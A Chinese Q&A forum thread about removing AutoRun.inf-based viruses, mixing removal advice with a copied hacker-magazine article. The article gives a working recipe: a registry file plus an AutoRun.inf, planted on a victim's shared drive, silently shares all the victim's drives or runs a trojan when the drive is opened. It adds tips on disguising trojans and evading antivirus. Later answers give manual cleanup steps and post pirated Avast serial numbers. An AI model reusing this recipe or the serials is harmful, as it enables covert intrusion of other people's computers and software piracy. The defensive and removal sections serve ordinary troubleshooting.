1000分問題,關(guān)于電腦中毒~解決了就給 能幫我解決問題的我?guī)退?000分
最近網(wǎng)上流行通過AutoRun.inf文件使對方所有的硬盤完全共享或中木馬的方法,由于AutoRun.inf文件在黑客技術(shù)中的應(yīng)用還是很少見的,相應(yīng)的資料也不多,有很多人對此覺得很神秘,本文試圖為您解開這個(gè)迷,使您能完全的了解這個(gè)并不復(fù)雜卻極其有趣的技術(shù)。
一、理論基礎(chǔ)
經(jīng)常使用光盤的朋友都知道,有很多光盤放入光驅(qū)就會自動運(yùn)行,它們是怎么做的呢?光盤一放入光驅(qū)就會自動被執(zhí)行,主要依靠兩個(gè)文件,一是光盤上的AutoRun.inf文件,另一個(gè)是操作系統(tǒng)本身的系統(tǒng)文件之一的Cdvsd.vxd。Cdvsd.vxd會隨時(shí)偵測光驅(qū)中是否有放入光盤的動作,如果有的話,便開始尋找光盤根目錄下的AutoRun.inf文件。如果存在AutoRun.inf文件則執(zhí)行它里面的預(yù)設(shè)程序。
AutoRun.inf不光能讓光盤自動運(yùn)行程序,也能讓硬盤自動運(yùn)行程序,方法很簡單,先打開記事本,然后用鼠標(biāo)右鍵點(diǎn)擊該文件,在彈出菜單中選擇“重命名”,將其改名為AutoRun.inf,在AutoRun.inf中鍵入以下內(nèi)容:
[AutoRun] //表示AutoRun部分開始,必須輸入
Icon=C:\C.ico //給C盤一個(gè)個(gè)性化的盤符圖標(biāo)C.ico
Open=C:\1.exe //指定要運(yùn)行程序的路徑和名稱,在此為C盤下的1.exe
保存該文件,按F5刷新桌面,再看“我的電腦”中的該盤符(在此為C盤),你會發(fā)現(xiàn)它的磁盤圖標(biāo)變了,雙擊進(jìn)入C盤,還會自動播放C盤下的1.exe文件!
解釋一下:“[AutoRun]”行是必須的固定格式,“Icon”行對應(yīng)的是圖標(biāo)文件,“C:\C.ico”為圖標(biāo)文件路徑和文件名,你在輸入時(shí)可以將它改為你的圖片文件所在路徑和文件名。另外,“.ico”為圖標(biāo)文件的擴(kuò)展名,如果你手頭上沒有這類文件,可以用看圖軟件ACDSee將其他格式的軟件轉(zhuǎn)換為ico格式,或者找到一個(gè)后綴名為BMP的文件,將它直接改名為ICO文件即可。
“Open”行指定要自動運(yùn)行的文件及其盤符和路徑。要特別說明的是,如果你要改變的硬盤跟目錄下沒有自動播放文件,就應(yīng)該把“OPEN”行刪掉,否則就會因?yàn)檎也坏阶詣硬シ盼募虿婚_硬盤,此時(shí)只能用鼠標(biāo)右鍵單擊盤符在彈出菜單中選“打開”才行。
請大家注意:保存的文件名必須是“AutoRun.inf”,編制好的Autorun.inf文件和圖標(biāo)文件一定要放在硬盤根目錄下。更進(jìn)一步,如果你的某個(gè)硬盤內(nèi)容暫時(shí)比較固定的話,不妨用Flash做一個(gè)自動播放文件,再編上“Autorun”文件,那你就有最酷、最個(gè)性的硬盤了。
到這兒還沒有完。大家知道,在一些光盤放入后,我們在其圖標(biāo)上單擊鼠標(biāo)右鍵,還會產(chǎn)生一個(gè)具有特色的目錄菜單,如果能對著我們的硬盤點(diǎn)擊鼠標(biāo)右鍵也產(chǎn)生這樣的效果,那將更加的有特色。其實(shí),光盤能有這樣的效果也僅僅是因?yàn)樵贏utoRun.inf文件中有如下兩條語句:
shell\標(biāo)志=顯示的鼠標(biāo)右鍵菜單中內(nèi)容
shell\標(biāo)志\command=要執(zhí)行的文件或命令行
所以,要讓硬盤具有特色的目錄菜單,在AutoRun.inf文件中加入上述語句即可,示例如下:
shell\1=天若有情天亦老
shell\1\command\=notepad ok.txt
保存完畢,按F5鍵刷新,然后用鼠標(biāo)右鍵單擊硬盤圖標(biāo),在彈出菜單中會發(fā)現(xiàn)“天若有情天亦老”(圖1),點(diǎn)擊它,會自動打開硬盤中的“ok.txt”文件。注意:上面示例假設(shè)“ok.txt”文件在硬盤根目錄下,notepad為系統(tǒng)自帶的記事本程序。如果要執(zhí)行的文件為直接可執(zhí)行程序,則在“command\”后直接添加該執(zhí)行程序文件名即可。
圖 1
二、實(shí)例
下面就舉個(gè)例子:如果你掃到一臺開著139共享的機(jī)器,而對方只完全共享了D盤,我們要讓對方的所有驅(qū)動器都共享。首先編輯一個(gè)注冊表文件,打開記事本,鍵入以下內(nèi)容:
REGEDIT4
'此處一定要空一行
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\C$]
"Path"="C:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000302
"Parmlenc"=hex:
"Parm2enc"=hex:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\D$]
"Path"="D:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000302
"Parmlenc"=hex:
"Parm2enc"=hex:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\C$]
"Path"="E:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000302
"Parmlenc"=hex:
"Parm2enc"=hex:
以上我只設(shè)置到E盤,如果對方有很多邏輯盤符的請自行設(shè)置。將以上部分另存為Share.reg文件備用。要特別注意REGEDIT4為大寫且頂格書寫,其后要空上一行,在最后一行記得要按一次回車鍵。
然后打開記事本,編制一個(gè)AutoRun.inf文件,鍵入以下內(nèi)容:
[AutoRun]
Open=regedit/s Share.reg //加/s參數(shù)是為了導(dǎo)入時(shí)不會顯示任何信息
保存AutoRun.inf文件。將Share.reg和AutoRun.inf這兩個(gè)文件都復(fù)制到對方的D盤的根目錄下,這樣對方只要雙擊D盤就會將Share.reg導(dǎo)入注冊表,這樣對方電腦重啟后所有驅(qū)動器就會都完全共享出來。
如果想讓對方中木馬,只要在AutoRun.inf文件中,把“Open=Share.Reg”改成“Open=木馬服務(wù)端文件名”,然后把AutoRun.inf和配置好的木馬服務(wù)端一起復(fù)制到對方D盤的根目錄下,這樣不需對方運(yùn)行木馬服務(wù)端程序,而只需他雙擊D盤就會使木馬運(yùn)行!這樣做的好處顯而易見,那就是大大的增加了木馬運(yùn)行的主動性!須知許多人現(xiàn)在都是非常警惕的,不熟悉的文件他們輕易的不會運(yùn)行,而這種方法就很難防范了。
要說明的是,給你下木馬的人不會那么蠢的不給木馬加以偽裝,一般說來,他們會給木馬服務(wù)端文件改個(gè)名字,或好聽或和系統(tǒng)文件名很相像,然后給木馬換個(gè)圖標(biāo),使它看起來像TXT文件、ZIP文件或圖片文件等,,最后修改木馬的資源文件使其不被殺毒軟件識別(具體的方法可以看本刊以前的文章),當(dāng)服務(wù)端用戶信以為真時(shí),木馬卻悄悄侵入了系統(tǒng)。其實(shí),換個(gè)角度理解就不難了——要是您給別人下木馬我想你也會這樣做的。以上手段再輔以如上內(nèi)容的AutoRun.inf文件就天衣無縫了!
三、防范方法
共享分類完全是由flags標(biāo)志決定的,它的鍵值決定了共享目錄的類型。當(dāng)flags=0x302時(shí),重新啟動系統(tǒng),目錄共享標(biāo)志消失,表面上看沒有共享,實(shí)際上該目錄正處于完全共享狀態(tài)。網(wǎng)上流行的共享蠕蟲,就是利用了此特性。如果把"Flags"=dword:00000302改成"Flags"=dword:00000402,就可以看到硬盤被共享了,明白了嗎?秘密就在這里!
以上代碼中的Parmlenc、Parm2enc屬性項(xiàng)是加密的密碼,系統(tǒng)在加密時(shí)采用了8位密碼分別與“35 9a 4b a6 53 a9 d4 6a”進(jìn)行異或運(yùn)算,要想求出密碼再進(jìn)行一次異或運(yùn)算,然后查ASCII表可得出目錄密碼。在網(wǎng)絡(luò)軟件中有一款軟件就利用該屬性進(jìn)行網(wǎng)絡(luò)密碼破解的,在局域網(wǎng)內(nèi)從一臺機(jī)器上可以看到另一臺計(jì)算機(jī)的共享密碼。
利用TCP/IP協(xié)議設(shè)計(jì)的NethackerⅡ軟件可以穿過Internet網(wǎng)絡(luò),找到共享的主機(jī),然后進(jìn)行相應(yīng)操作。所以當(dāng)您通過Modem上網(wǎng)時(shí),千萬要小心,因?yàn)橐徊恍⌒模闹鳈C(jī)將完全共享給對方了。
解決辦法是把HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面的“C$”、“D$”、“E$”等刪掉。然后刪除windows\system\下面的Vserver.vxd刪除,它是Microsoft網(wǎng)絡(luò)上的文件與打印機(jī)共享虛擬設(shè)備驅(qū)動程序,再把HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\下的Vserver鍵值刪掉,就會很安全了。
另外,關(guān)閉硬盤AutoRun功能也是防范黑客入侵的有效方法之一。具體方法是在“開始”菜單的“運(yùn)行”中輸入Regedit,打開注冊表編輯器,展開到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Exploer主鍵下,在右側(cè)窗格中找到“NoDriveTypeAutoRun”,就是這個(gè)鍵決定了是否執(zhí)行CDROM或硬盤的AutoRun功能。
雙擊“NoDriveTypeAutoRun”,在默認(rèn)狀態(tài)下(即你沒有禁止過AutoRun功能),在彈出窗口中可以看到“NoDriveTypeAutoRun”默認(rèn)鍵值為95,00,00,00,如圖所示(圖2)。其中第一個(gè)值“95”是十六進(jìn)制值,它是所有被禁止自動運(yùn)行設(shè)備的和。將“95”轉(zhuǎn)為二進(jìn)制就是10010101,其中每位代表一個(gè)設(shè)備,Windows中不同設(shè)備會用如下數(shù)值表示:
圖 2
設(shè)備名稱 第幾位 值 設(shè)備用如下數(shù)值表示 設(shè)備名稱含義
DKIVE_UNKNOWN 0 1 01h 不能識別的設(shè)備類型
DRIVE_NO_ROOT_DIR 1 0 02h 沒有根目錄的驅(qū)動器(Drive without root directory)
DRIVE_REMOVABLE 2 1 04h 可移動驅(qū)動器(Removable drive)
DRIVE_FIXED 3 0 08h 固定的驅(qū)動器(Fixed drive)
DRIVE_REMOTE 4 1 10h 網(wǎng)絡(luò)驅(qū)動器(Network drive)
DRIVE_CDROM 5 0 20h 光驅(qū)(CD-ROM)
DRIVE_RAMDISK 6 0 40h RAM磁盤(RAM Disk)
保留 7 1 80h 未指定的驅(qū)動器類型(Not yet specified drive disk)
在上面所列的表中值為“0”表示設(shè)備運(yùn)行,值為“1”表示該設(shè)備不運(yùn)行(默認(rèn)情況下,Windows禁止80h、10h、4h、01h這些設(shè)備自動運(yùn)行,這些數(shù)值累加正好是十六進(jìn)制的95h,所以NoDriveTypeAutoRun”默認(rèn)鍵值為95,00,00,00)。
由上面的分析不難看出,在默認(rèn)情況下,會自動運(yùn)行的設(shè)備是DRIVE_NO_ROOT_DIR、DRIVE_FIXED、DRIVE_CDROM、DRIVE_RAMDISK這四個(gè)保留設(shè)備,所以要禁止硬盤自動運(yùn)行AutoRun.inf文件,就必須將DRIVE_FIXED的值設(shè)為1,這是因?yàn)镈RIVE_FIXED代表固定的驅(qū)動器,即硬盤。這樣一來,原來的10010101(在表中“值”列中由下向上看)就變成了二進(jìn)制的10011101,轉(zhuǎn)為十六進(jìn)制為9D。現(xiàn)在,將“NoDriveTypeAutoRun”的鍵值改為9D,00,00,00后關(guān)閉注冊表編輯器,重啟電腦后就會關(guān)閉硬盤的AutoRun功能。
如果你看明白了,那你肯定知道該怎樣禁止光盤AutoRun功能了,對!就是將DRIVE_CDROM設(shè)為1,這樣“NoDriveTypeAutoRun”鍵值中的第一個(gè)值就變成了10110101,也就是十六進(jìn)制的B5。將第一個(gè)值改為B5后關(guān)閉注冊表編輯器,重啟電腦后就會關(guān)閉CDROM的Autorun功能。如果僅想禁止軟件光盤的AutoRun功能,但又保留對CD音頻碟的自動播放能力,這時(shí)只需將“NoDriveTypeAutoRun”的鍵值改為:BD,00,00,00即可。
如果想要恢復(fù)硬盤或光驅(qū)的AutoRun功能,進(jìn)行反方向操作即可。
事實(shí)上,大多數(shù)的硬盤根目錄下并不需要AutoRun.inf文件來運(yùn)行程序,因此我們完全可以將硬盤的AutoRun功能關(guān)閉,這樣即使在硬盤根目錄下有AutoRun.inf這個(gè)文件,Windows也不會去運(yùn)行其中指定的程序,從而可以達(dá)到防止黑客利用AutoRun.inf文件入侵的目的。
除此以外,我們還應(yīng)讓W(xué)indows能顯示出隱藏的共享。大家都知道,在Windows 9X中設(shè)置共享時(shí),通過在共享名后加上“$”這個(gè)符號,可使共享隱藏。比如,我們給一個(gè)名為share的計(jì)算機(jī)的C盤設(shè)置共享時(shí),只要將其共享名設(shè)為C$。這樣我們將看不到被共享的C盤,只有通過輸入該共享的確切路徑,才能訪問此共享。不過我們只要用將電腦中的msnp32.dll文件稍做修改。就可以讓W(xué)indows顯示出隱藏的共享。
由于在Windows下msnp32.dll會被調(diào)用,不能直接修改此文件,所以第一步我們要復(fù)制msnp32.dll到C盤下并改名為msnp32,msnp32.dll在C:\Windows\system文件夾下。運(yùn)行UltraEdit等十六進(jìn)制文件編輯器打開msnp32,找到“24 56 E8 17”(位于偏移地址00003190~000031A0處),找到后將“24”改為“00”,然后保存,關(guān)閉UltraEdit。重啟計(jì)算機(jī)進(jìn)入DOS模式,在命令提示符下輸入copy c:\msnp32.dll c:\Windows\system\msnp32.dll,重啟進(jìn)入Windows,現(xiàn)在雙擊share就能看見被隱藏的共享了。
最后要提醒大家利用TCP/IP協(xié)議設(shè)計(jì)的NethackerⅡ等黑客軟件可以穿過Internet網(wǎng)絡(luò),找到共享的主機(jī),然后進(jìn)行相應(yīng)操作。所以當(dāng)您通過Modem上網(wǎng)時(shí),千萬要小心,因?yàn)橐徊恍⌒模闹鳈C(jī)將完全共享給對方了。防范這類事情發(fā)生的方法無非是經(jīng)常檢查系統(tǒng),給系統(tǒng)打上補(bǔ)丁,經(jīng)常使用反黑殺毒軟件,上網(wǎng)時(shí)打開防火墻,注意異常現(xiàn)象,留意AutoRun.inf文件的內(nèi)容,關(guān)閉共享或不要設(shè)置為完全共享,且加上復(fù)雜的共享密碼。
我以前就是這樣解決的
置于防范方法,我用的是kv,下載升級包升級.不用去注冊
如果這樣還是搞不定的話,用在線殺毒,查出這個(gè)病毒的名字 再到各殺毒軟件的病毒庫尋找手動解決的方法,或者直接在百度上搜,不需要改動注冊表的方法應(yīng)為這樣需要時(shí)間的抓緊,在程序未執(zhí)行以前搞定,而高級的木馬都會有多個(gè)修復(fù)文件的備份文件.一定要找到全部殺除的方法,如果系統(tǒng)在殺除后不能使用,就重裝吧,反正殺了毒了.
給你一個(gè)在線殺毒網(wǎng)
http://www.viruschina.com/include/mfzxsd.asp
最好用雅虎助手或者windows優(yōu)化大師終止病毒進(jìn)程(注意多個(gè)進(jìn)程),
問:打開我的電腦、雙擊盤符不能能打開,但是用右鍵菜單的“打開”命令可以打開,有時(shí)還出來一個(gè)對話框說“windows無法找到command.exe。打開“文件”類型需要該程序”,并且讓我找磁盤下的文件,我在windows文件夾下找到這個(gè)文件后,每次雙擊都會打開一個(gè)dos的窗口。請問這是怎么回事?
答:這有可能是因?yàn)槟銠C(jī)器中過病毒,殺毒之后的結(jié)果。這種病毒在每個(gè)驅(qū)動器下都有一個(gè)卷標(biāo)AutoRun.inf文件,只要你雙擊驅(qū)動器,就會激活病毒,我們需要手工來刪除AutoRun.inf這個(gè)文件,在“命令提示符”下輸入“attrib
autorun.inf -s -h -r”去掉它的“系統(tǒng)”、“只讀”、“隱藏”屬性,這樣輸入“del
autorun.inf”才可以刪除。接著進(jìn)入注冊表查找“COMMAND.EXE”鍵值項(xiàng),找到后將整個(gè)shell子鍵刪除。
解決的具體方法如下(以D盤為例):
開始---運(yùn)行---cmd(打開命令提示符)
D: dir /a (沒有參數(shù)A是看不到的,A是顯示所有的意思)
此時(shí)你會發(fā)現(xiàn)一個(gè)autorun.inf文件,
attrib autorun.inf -s -h -r 去掉autorun.inf文件的系統(tǒng)、只讀、隱藏屬性,否則無法刪除 autorun.inf ,
del autorun.inf
到這里還沒完,因?yàn)槟汶p擊了D盤盤符沒有打開卻得到一個(gè)錯(cuò)誤。要求定位DESKTOP.exe,
這個(gè)時(shí)候自動運(yùn)行的信息已經(jīng)加入注冊表了。下面清除注冊表中相關(guān)信息:
開始
運(yùn)行
regedit
編輯
查找
DESKTOP.exe
找到的第一個(gè)就是D盤的自動運(yùn)行,刪除整個(gè)shell子鍵
完畢.
重復(fù)以上操作數(shù)次,解決其他驅(qū)動器的問題,注冊表中的信息是在一起的,在刪除D盤
Shell\Open\Autorun的時(shí)候順便都刪除了吧。
推薦我現(xiàn)在使用的殺毒軟件,個(gè)人認(rèn)為是目前最強(qiáng)的殺軟
現(xiàn)在網(wǎng)上最火的殺軟AVAST中文版(世界排名十二)
在歐洲被稱為唯一能與NOD32媲美的殺軟avast4.7官方中文專業(yè)版
推薦用迅雷下載
http://www.3k16.com/ruanjian/UploadFiles_7827/200605/avast4.7%B9%D9%B7%BD%D6%D0%CE%C4%D7%A8%D2%B5%B0%E6.rar
序列號:
S6039686R6039W1106-FBYVE2MU 有效期2009.5.6
升級有效期2010.1.1
S7935192R4371Z1106-S1BJD5AJ 有效期2012.1.6
升級有效期2008.8.1
S6945137R6826L1106-WXH4K1SJ 有效期2008.4.6
升級有效期2010.9.
來自捷克的AVAST,已有17年的歷史,但最近才在我們這里興起,它在國外市場一直處于領(lǐng)先地位。Avast!的實(shí)時(shí)監(jiān)控功能十分強(qiáng)大!它擁有七大防護(hù)模塊:網(wǎng)絡(luò)防火墻防護(hù)、標(biāo)準(zhǔn)的本地文件讀取防護(hù)、網(wǎng)頁防護(hù)、即時(shí)通訊軟件防護(hù)、郵件收發(fā)防護(hù)、P2P軟件防護(hù)。這么完善的防護(hù)系統(tǒng),定能讓你的系統(tǒng)練就一副金剛不壞之身!任意開啟各項(xiàng)保護(hù)模塊能夠查殺流氓軟件,比如3721。升級很人性化Avast是捷克一家軟件公司(ALWIL Software)的產(chǎn)品。ALWIL 軟件公司的研發(fā)機(jī)構(gòu)在捷克的首都-布拉格,現(xiàn)在他們和世界上許多國家的安全軟件機(jī)構(gòu)都有良好的合作關(guān)系。早在80年代末ALWIL公司的安全軟件已經(jīng)獲得良好的市場占有率,但當(dāng)時(shí)僅限于捷克地區(qū)。ALMIL公司是擅長于安全軟件方面的研發(fā),開發(fā)的Avast Antivirus系列是他們的拳頭產(chǎn)品,Avast在許多重要的市場和權(quán)威評獎中都取得了驕人的成績,同樣在此后進(jìn)軍國際市場上也贏得了良好的增長率。
主要特點(diǎn):
(1)高偵測的反病毒表現(xiàn),多次獲得過ICSA和VirusBulletin 100%認(rèn)證,啟發(fā)式強(qiáng)大。
(2)較低的內(nèi)存占用和直觀,簡潔的使用界面。
(3)支持SKIN更換,完善的程序內(nèi)存檢測
(4)對SMTP/POP3/IMAP郵件收發(fā)監(jiān)控的全面保護(hù)。
(5)支持MS OUTLOOK外掛,智能型郵件帳號分析。
(6)支持宏病毒文檔修復(fù),修復(fù)檔案后自動產(chǎn)生病毒還原數(shù)據(jù)庫(VRDB功能)。
(7)支持P2P共享下載軟件和即時(shí)通訊病毒檢測,保護(hù)全面。
(8)良好有效的偵測并清除病毒,如蟲,廣告和木馬程序
(9)病毒庫更新速度快,對新型病毒和木馬有迅捷的反應(yīng)。
功能特性如下:
*反病毒內(nèi)核
*自動升級
*簡單的使用界面
*病毒隔離區(qū)
*實(shí)時(shí)監(jiān)控
*系統(tǒng)結(jié)合
*P2P和聊天軟件監(jiān)控保護(hù)
*病毒清除
*網(wǎng)絡(luò)防護(hù)
*64位系統(tǒng)支持
*網(wǎng)頁防護(hù)
*多國語言支持
*增強(qiáng)型用戶界面
*惡意腳本屏蔽 *DOS下掃描
*擴(kuò)展病毒庫升級 *移除病毒備份
占用內(nèi)存不到25兆,讓你老機(jī)器也流暢
WOW木馬
1.結(jié)束病毒的進(jìn)程%Windows%\smss.exe
2.刪除相關(guān)文件:
C:\MSCONFIG.SYS
%Windows%\1.com
%Windows%\ExERoute.exe
%Windows%\explorer.com
%Windows%\finder.com
%Windows%\smss.exe
%Windows%\Debug\DebugProgram.exe
%System%\command.pif
%System%\dxdiag.com
%System%\finder.com
%System%\MSCONFIG.COM
%System%\regedit.com
%System%\rundll32.com
%ProgramFiles%\InternetExplorer\iexplore.com
%ProgramFiles%\CommonFiles\iexplore.pif
3.恢復(fù)EXE文件關(guān)聯(lián)
刪除[HKEY_CLASSES_ROOT\winfiles]項(xiàng)
4.刪除病毒啟動項(xiàng):
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"TorjanProgram"="%Windows%\smss.exe"
修改[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon]下
"shell"="Explorer.exe1"
為
"shell"="Explorer.exe"
5.恢復(fù)病毒修改的注冊表信息:
(1)分別查找“command.pif”、“finder.com”、“rundll32.com”的信息,將“command.pif”、“finder.com”、“rundll32.com”修改為“rundll32.exe”
(2)查找“explorer.com”的信息,將“explorer.com”修改為“explorer.exe”
(3)查找“iexplore.com”的信息,將“iexplore.com”修改為“iexplore.exe”
(4)查找“iexplore.pif”的信息,將找到的“%ProgramFiles%\CommonFiles\iexplore.pif”修改為“%ProgramFiles%\InternetExplorer\iexplore.exe”
在注冊表編輯器中定位到“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon”,編輯右邊“Shell”的內(nèi)容,修改為“Explorer.exe”。
樓主好運(yùn)
染上了lsass病毒,顯示發(fā)現(xiàn)d盤下面無故多了兩個(gè)文件:autorun.inf,和command.com文件,刪了,過一會兒又出現(xiàn)了。然后發(fā)現(xiàn)用戶進(jìn)程多了一個(gè)LSASS.exe,并且用進(jìn)程管理工具結(jié)束不了,提示為系統(tǒng)進(jìn)程無法結(jié)束,初步懷疑中招了。
關(guān)鍵字lsass.exe百度一下,發(fā)現(xiàn)有說lsass.exe病毒的詞條,點(diǎn)開發(fā)現(xiàn)里面描述的癥狀跟我的一模一樣,但是我還沒有發(fā)現(xiàn)該病毒對我的電腦造成什么破壞,我系統(tǒng)原本啟動之后的進(jìn)程:
呵呵,被我優(yōu)化了,后來有了一個(gè)就是上面LSASS.exe進(jìn)程,很不爽。
解決方法:登錄瑞星在線殺毒網(wǎng)站,在線殺毒,之前我用的是卡巴斯基,名氣很大,好像不怎么殺毒,我就把卡巴斯基的監(jiān)控進(jìn)程給關(guān)掉了,只留下卡巴斯基的守護(hù)進(jìn)程kavsvc.exe。瑞星在線殺毒確實(shí)不錯(cuò)(強(qiáng)烈支持),卡巴斯基掃描了好幾次系統(tǒng),每次的結(jié)果都是查毒結(jié)果:病毒0,瑞星在線殺毒使用了一下,不錯(cuò)查到了:
然后看看網(wǎng)上的其他的參考資料,還要把如下硬盤中的文件:
c:\program files\common files\INTEXPLORE.pifc:\program files\internet explorer\INTEXPLORE.com%SYSTEM\debug\debugprogram.exe%SYSTEM\system32\Anskya0.exe%SYSTEM\system32\dxdiag.com%SYSTEM\system32\MSCONFIG.com%SYSTEM\system32\regedit.com%SYSTEM\system32\LSASS.exe%SYSTEM\system32\EXERT.exe
刪除。照著上面做,果然好了,好了,不寫了,實(shí)驗(yàn)室要關(guān)門了,下次。
ps:看到很多朋友都很關(guān)注這偏文章,有人反映還是解決不了問題,我覺得可能寫的不夠詳細(xì),條理可能不夠清楚,特補(bǔ)充一點(diǎn),希望能給大家解難。
碰到這個(gè)問題,建議可以采取下列步驟:
中招癥狀
癥狀一:打開windows任務(wù)管理器,發(fā)現(xiàn)若用戶進(jìn)程中有LSASS.exe進(jìn)程,而非系統(tǒng)進(jìn)程,系統(tǒng)進(jìn)程中其實(shí)也有一個(gè)lsass.exe進(jìn)程,次進(jìn)程非彼進(jìn)程。一個(gè)是系統(tǒng)進(jìn)程,屬于操作系統(tǒng)為用戶提供服務(wù)所必須的進(jìn)程,一個(gè)是用戶進(jìn)程,屬于用戶運(yùn)行的程序。所謂用戶進(jìn)程和系統(tǒng)進(jìn)程的區(qū)別:可以看任務(wù)管理器任務(wù)中的User name列,該列是System的就是系統(tǒng)進(jìn)程,一般是操作系統(tǒng)的進(jìn)程,或者是其他軟件的守護(hù)進(jìn)程,如kavsvc.exe就是卡巴斯基的守護(hù)進(jìn)程。User name列是你windows系統(tǒng)登錄的用戶名的就是用戶進(jìn)程,有的朋友用Administrator用戶登錄,則任務(wù)管理器的進(jìn)程選項(xiàng)卡中的User name列中是Administrator的就是用戶進(jìn)程,如下圖中的UltraCapture.exe(截圖軟件的進(jìn)程),taskmgr.exe(任務(wù)管理器的進(jìn)程), explorer.exe(資源管理器,打開我的電腦等單獨(dú)啟動的一個(gè)進(jìn)程,有的用戶該進(jìn)程是合在系統(tǒng)的explorer.exe中的)都是用戶進(jìn)程,其他的都是系統(tǒng)進(jìn)程。
癥狀二:d盤的根目錄下面有兩個(gè)文件:autorun.inf和command.com,其中command.com是隱藏屬性的。
雖然該病毒,暫時(shí)沒有對明顯的占用系統(tǒng)資源,或者破壞系統(tǒng),破壞文件之類的。但是卻存在著潛在的危險(xiǎn)。
解決方法
步驟一:在運(yùn)行框中輸入msconfig命令,選擇啟動項(xiàng)選項(xiàng)卡,取消LSASS.exe隨系統(tǒng)啟動的選項(xiàng)。
步驟二:刪除系統(tǒng)中的如下病毒文件,有的文件可能提示無法刪除,不過沒有關(guān)系,先刪除其它的,然后重啟windows,再去刪除剩下的幾個(gè)剛才沒有刪除的,這回應(yīng)該是可以了。
c:\program files\common files\INTEXPLORE.pifc:\program files\internet explorer\INTEXPLORE.com%SYSTEM\debug\debugprogram.exe%SYSTEM\system32\Anskya0.exe%SYSTEM\system32\dxdiag.com%SYSTEM\system32\MSCONFIG.com%SYSTEM\system32\regedit.com%SYSTEM\system32\LSASS.exe%SYSTEM\system32\EXERT.exe
步驟三:啟動殺毒軟件殺毒,進(jìn)行全盤掃描。好像卡巴斯基不怎么管用,用瑞星或者是金山毒霸應(yīng)該是可以的。
步驟四:殺完毒后,重啟windows就基本ok了。
另外:如果發(fā)現(xiàn),有的.exe程序無法運(yùn)行,且出來一個(gè)選擇打開程序的列表框,新建一個(gè)reg文件,輸入如下內(nèi)容: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe] @="exefile" "Content Type"="%1,%*" [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\PersistentHandler] @="{098f2470-bae0-11cd-b579-08002b30bfeb}"
然后允許該注冊表添加文件即可。
1、我也中過這個(gè)病毒,重裝系統(tǒng)后過幾天會再產(chǎn)生的。
這應(yīng)該是種winfile病毒。
LSASS.EXE為正常的系統(tǒng)進(jìn)程,而LSASS.exe為病毒進(jìn)程。
2、原因應(yīng)該是:
該病毒修改注冊表啟動RUN鍵值,指向LSASS.exe,修改HKEY_CLASSES_ROOT下的.exe,exefile鍵值,并新建windowfile鍵值。將exe文件打開鏈接關(guān)聯(lián)到其生成的病毒程序%SYSTEM\EXERT.exe上。
3、殺毒方法:
使用winpe光盤啟動,如 深山紅葉
找到并刪除上述文件,并使用搜索功能,查找全部硬盤文件大小在41KB到43KB之間的所有文件,在結(jié)果中查看并刪除大小為42.02KB的所有文件。
設(shè)定c:\windows為當(dāng)前系統(tǒng)盤,運(yùn)行winpe中的注冊表編輯器,刪除RUN鍵值中的LSASS.exe條目,修改HKEY_CLASSES_ROOT下.exe默認(rèn)鍵值回到exefile,修改HKEY_CLASSES_ROOT下exefile鍵值為"%1" %*。刪除d:\autorun.inf和command.com文件。
4、補(bǔ)充建議:
目前最新的趨勢版本病毒碼3.343,清除模塊730,不能查出該病毒。使用的windows的補(bǔ)丁包打好,使用上面方法殺掉病毒后,最好再裝一個(gè)最新的瑞星。
如果不放心就徹底再查殺一遍系統(tǒng),防止再生成。
1、我也中過這個(gè)病毒,重裝系統(tǒng)后過幾天會再產(chǎn)生的。
這應(yīng)該是種winfile病毒。
LSASS.EXE為正常的系統(tǒng)進(jìn)程,而LSASS.exe為病毒進(jìn)程。
2、原因應(yīng)該是:
該病毒修改注冊表啟動RUN鍵值,指向LSASS.exe,修改HKEY_CLASSES_ROOT下的.exe,exefile鍵值,并新建windowfile鍵值。將exe文件打開鏈接關(guān)聯(lián)到其生成的病毒程序%SYSTEM\EXERT.exe上。
3、殺毒方法:
使用winpe光盤啟動,如 深山紅葉
找到并刪除上述文件,并使用搜索功能,查找全部硬盤文件大小在41KB到43KB之間的所有文件,在結(jié)果中查看并刪除大小為42.02KB的所有文件。
設(shè)定c:\windows為當(dāng)前系統(tǒng)盤,運(yùn)行winpe中的注冊表編輯器,刪除RUN鍵值中的LSASS.exe條目,修改HKEY_CLASSES_ROOT下.exe默認(rèn)鍵值回到exefile,修改HKEY_CLASSES_ROOT下exefile鍵值為"%1" %*。刪除d:\autorun.inf和command.com文件。
4、補(bǔ)充建議:
目前最新的趨勢版本病毒碼3.343,清除模塊730,不能查出該病毒。使用的windows的補(bǔ)丁包打好,使用上面方法殺掉病毒后,最好再裝一個(gè)最新的瑞星。
如果不放心就徹底再查殺一遍系統(tǒng),防止再生成。
直惠19483123498: 電腦中毒了怎么解
建鄴區(qū)急回: ______ 親可以下一個(gè)Advanced SystemCare Pro 在網(wǎng)上找一個(gè)激活碼 然后深度清理 不行的話只有做系統(tǒng)了
直惠19483123498: 電腦中毒 怎么辦 -
建鄴區(qū)急回: ______ ***強(qiáng)力推薦:更精彩的實(shí)戰(zhàn)真實(shí)詳細(xì)記錄請看: 【實(shí)戰(zhàn)】U盤專殺妙解雙擊不能打開磁盤分區(qū)(explorer加載) New New 使用的方法: [分享]更簡單的清除頑固病毒的方法 New 【分享】教你妙用360清除頑固木馬(如新的asn.2病毒等) 多種方...
直惠19483123498: 我的電腦有病毒怎么辦?
